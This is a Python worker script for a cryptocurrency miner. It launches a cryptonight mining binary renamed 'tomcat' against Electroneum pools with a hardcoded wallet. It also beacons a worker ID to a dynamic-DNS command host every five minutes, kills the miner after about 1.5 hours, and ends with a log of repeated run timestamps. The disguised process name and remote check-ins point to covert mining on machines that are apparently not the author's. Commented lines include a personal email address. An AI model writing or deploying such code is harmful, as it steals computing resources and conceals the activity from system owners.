import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:04.218042
#2018-02-17 16:05:06.976474
#2018-02-17 17:52:07.488059
#2018-02-17 20:31:04.146910
#2018-02-17 22:17:05.652311
#2018-02-18 00:01:07.110929
#2018-02-18 01:53:05.306973
#2018-02-18 03:41:07.054468
#2018-02-18 05:30:01.878986
#2018-02-18 07:21:07.093992
#2018-02-18 09:09:01.522290
#2018-02-18 10:55:07.786528
#2018-02-18 12:41:05.087183
#2018-02-18 14:28:01.342782
#2018-02-18 16:18:01.332466
#2018-02-18 18:07:06.055036
#2018-02-18 19:53:05.372376
#2018-02-18 21:41:07.046214
#2018-02-18 23:29:03.594349
#2018-02-19 01:16:05.437270
#2018-02-19 03:03:01.947804
#2018-02-19 04:49:02.103590
#2018-02-19 06:33:07.447919
#2018-02-19 08:22:06.649863
#2018-02-19 10:13:06.929218
#2018-02-19 12:00:01.472537
#2018-02-19 13:46:08.023148
#2018-02-19 15:36:10.003897
#2018-02-19 17:23:10.771002
#2018-02-19 19:10:09.451873
#2018-02-19 20:57:05.367540
#2018-02-19 22:45:08.115750
#2018-02-20 00:30:04.510328
#2018-02-20 02:17:03.857944
#2018-02-20 04:07:05.126254
#2018-02-20 05:50:04.538364
#2018-02-20 07:36:01.919312
#2018-02-20 09:20:05.457974
#2018-02-20 11:04:01.922749
#2018-02-20 12:50:02.064888
#2018-02-20 14:35:04.198804
#2018-02-20 16:19:04.895842
#2018-02-20 18:06:02.030350
#2018-02-20 19:56:05.831520
#2018-02-20 21:44:08.551750
#2018-02-20 23:26:07.945687
#2018-02-21 01:10:05.873698
#2018-02-21 02:56:01.878359
#2018-02-21 04:44:04.210329
#2018-02-21 06:31:07.149983
#2018-02-21 08:16:01.563561
#2018-02-21 10:01:01.731025
#2018-02-21 11:49:06.218042
#2018-02-21 13:39:05.547732
#2018-02-21 15:22:03.997893
#2018-02-21 17:11:09.186099
#2018-02-21 18:58:08.913268
#2018-02-21 20:42:05.713898
#2018-02-21 22:26:08.122805
#2018-02-22 00:16:05.224090
#2018-02-22 02:07:06.272315
#2018-02-22 03:52:06.058964
#2018-02-22 05:38:05.395723
#2018-02-22 07:22:07.515969
#2018-02-22 09:09:05.682476
#2018-02-22 10:57:05.216248
#2018-02-22 12:42:05.475653
#2018-02-22 14:27:06.204764
#2018-02-22 16:12:11.949395
#2018-02-22 17:59:08.113388
#2018-02-22 19:47:01.677806
#2018-02-22 21:36:09.942801
#2018-02-22 23:23:06.179313
#2018-02-23 01:11:08.250771
#2018-02-23 02:59:01.705033
#2018-02-23 04:46:04.177262
#2018-02-23 06:31:08.266355
#2018-02-23 08:19:07.680915
#2018-02-23 10:36:05.814269
#2018-02-23 12:28:05.619669
#2018-02-23 14:16:01.638658
#2018-02-23 16:06:10.134771
#2018-02-23 17:53:07.908209
#2018-02-23 19:38:05.886676
#2018-02-23 21:21:01.553231
#2018-02-23 23:08:07.420937
#2018-02-24 00:54:07.536194
#2018-02-24 02:41:07.032057
#2018-02-24 04:36:03.356669
#2018-02-24 06:21:05.313147
#2018-02-24 08:08:05.918699
#2018-02-24 09:52:06.342695
#2018-02-24 11:47:06.166737
#2018-02-24 13:38:07.113854
#2018-02-24 15:26:04.531912
#2018-02-24 17:16:06.914714
#2018-02-24 19:07:06.324097
#2018-02-24 20:55:07.207176
#2018-02-24 23:21:04.515162
#2018-02-25 03:25:01.308445
#2018-02-25 07:22:06.815218